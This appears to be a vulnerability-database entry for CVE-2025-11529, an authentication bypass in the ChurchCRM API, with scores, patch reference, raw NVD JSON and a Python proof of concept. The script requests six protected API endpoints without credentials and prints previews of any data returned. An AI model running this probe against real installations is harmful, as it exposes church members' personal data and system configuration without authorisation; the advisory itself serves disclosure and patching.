Security Vulnerability Report
CVE-2025-11529 CVSS 7.3 HIGH

CVE-2025-11529

Published: 2025-10-09 03:15:32
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in ChurchCRM up to 5.18.0. This impacts the function AuthMiddleware of the file src/ChurchCRM/Slim/Middleware/AuthMiddleware.php of the component API Endpoint. The manipulation results in missing authentication. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The patch is identified as 3a1cffd2aea63d884025949cfbcfd274d06216a4. A patch should be applied to remediate this issue.

CVSS Details

CVSS Score
7.3 (VulDB secondary CVSS 3.1 score; the NVD primary CVSS 3.1 assessment in the raw JSON below is 9.8, CRITICAL)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM <= 5.18.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
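# CVE-2025-11529 PoC - ChurchCRM API Authentication Bypass
# This PoC demonstrates the missing authentication vulnerability
# in ChurchCRM's AuthMiddleware component
import sys

import requests

# Target ChurchCRM instance (can be overridden by the first command-line argument)
TARGET_URL = "http://target-churchcrm.example.com"

# Vulnerable API endpoints that should require authentication
# but are accessible without credentials due to AuthMiddleware flaw
API_ENDPOINTS = [
    "/api/persons",
    "/api/families",
    "/api/groups",
    "/api/users",
    "/api/dashboard",
    "/api/system/config",
]

# Per-request timeout in seconds
REQUEST_TIMEOUT = 10


def _is_json_response(response):
    """Return True when the response declares a JSON body.

    The probe asks for JSON (``Accept: application/json``); a 200 that
    carries a non-JSON body is presumably a login or landing page rather
    than an unauthenticated API result, so it must not count as a bypass.
    """
    content_type = response.headers.get("Content-Type", "")
    return "json" in content_type.lower()


def exploit_auth_bypass(base_url, endpoint):
    """
    Attempt to access a protected API endpoint without authentication.

    Due to CVE-2025-11529, the AuthMiddleware fails to enforce
    authentication on API requests.

    Args:
        base_url: Scheme and host of the ChurchCRM instance, e.g.
            ``http://host`` (a trailing slash is tolerated).
        endpoint: API path beginning with ``/``.

    Returns:
        True only when the endpoint answered 200 with a JSON body to a
        request carrying no credentials. False for any other status, for
        a redirect (not followed; typically the login page), for a
        non-JSON 200 (reported as INCONCLUSIVE) and on connection errors.
    """
    url = f"{base_url.rstrip('/')}{endpoint}"
    # Send request WITHOUT any authentication credentials
    # No cookies, no API keys, no session tokens
    headers = {
        "Accept": "application/json",
        "User-Agent": "Mozilla/5.0",
    }
    try:
        # allow_redirects=False: requests follows redirects by default, so
        # an unauthenticated request bounced to a login page that renders
        # with 200 would otherwise be reported as VULNERABLE (false positive).
        response = requests.get(
            url, headers=headers, timeout=REQUEST_TIMEOUT, allow_redirects=False
        )
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] {endpoint} - {e}")
        return False

    status = response.status_code
    if status == 200 and _is_json_response(response):
        print(f"[VULNERABLE] {endpoint} - Status: {status}")
        print(f" Response preview: {response.text[:200]}")
        return True
    if status == 200:
        # 200 without a JSON body: cannot tell an API result from a page;
        # do not count it toward the vulnerable total.
        print(f"[INCONCLUSIVE] {endpoint} - Status: {status} (non-JSON body)")
        return False
    print(f"[PROTECTED] {endpoint} - Status: {status}")
    return False


def main(base_url=None):
    """Probe every endpoint in API_ENDPOINTS and summarise the result.

    Args:
        base_url: Instance to check. Defaults to the first command-line
            argument when given, otherwise TARGET_URL.
    """
    if base_url is None:
        base_url = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    print(f"[*] Testing CVE-2025-11529 against {base_url}")
    print("[*] ChurchCRM AuthMiddleware Authentication Bypass\n")

    vulnerable_count = 0
    for endpoint in API_ENDPOINTS:
        if exploit_auth_bypass(base_url, endpoint):
            vulnerable_count += 1

    print(f"\n[*] Results: {vulnerable_count}/{len(API_ENDPOINTS)} endpoints vulnerable")
    if vulnerable_count > 0:
        print("[!] Target is VULNERABLE to CVE-2025-11529")
        print("[!] Recommended: Upgrade to ChurchCRM version with fix")
        print("[!] Patch: 3a1cffd2aea63d884025949cfbcfd274d06216a4")


if __name__ == "__main__":
    main()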

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11529", "sourceIdentifier": "[email protected]", "published": "2025-10-09T03:15:31.830", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in ChurchCRM up to 5.18.0. This impacts the function AuthMiddleware of the file src/ChurchCRM/Slim/Middleware/AuthMiddleware.php of the component API Endpoint. The manipulation results in missing authentication. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The patch is identified as 3a1cffd2aea63d884025949cfbcfd274d06216a4. A patch should be applied to remediate this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": 
[{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.19.0", "matchCriteriaId": "E88638D7-92B8-4BBC-97B9-827F4D6E6589"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/commit/3a1cffd2aea63d884025949cfbcfd274d06216a4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ChurchCRM/CRM/pull/7376", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/uartu0/advisories/blob/main/churchcrm-api-auth-bypass-2025.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327667", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327667", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.669916", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/uartu0/a ... (truncated)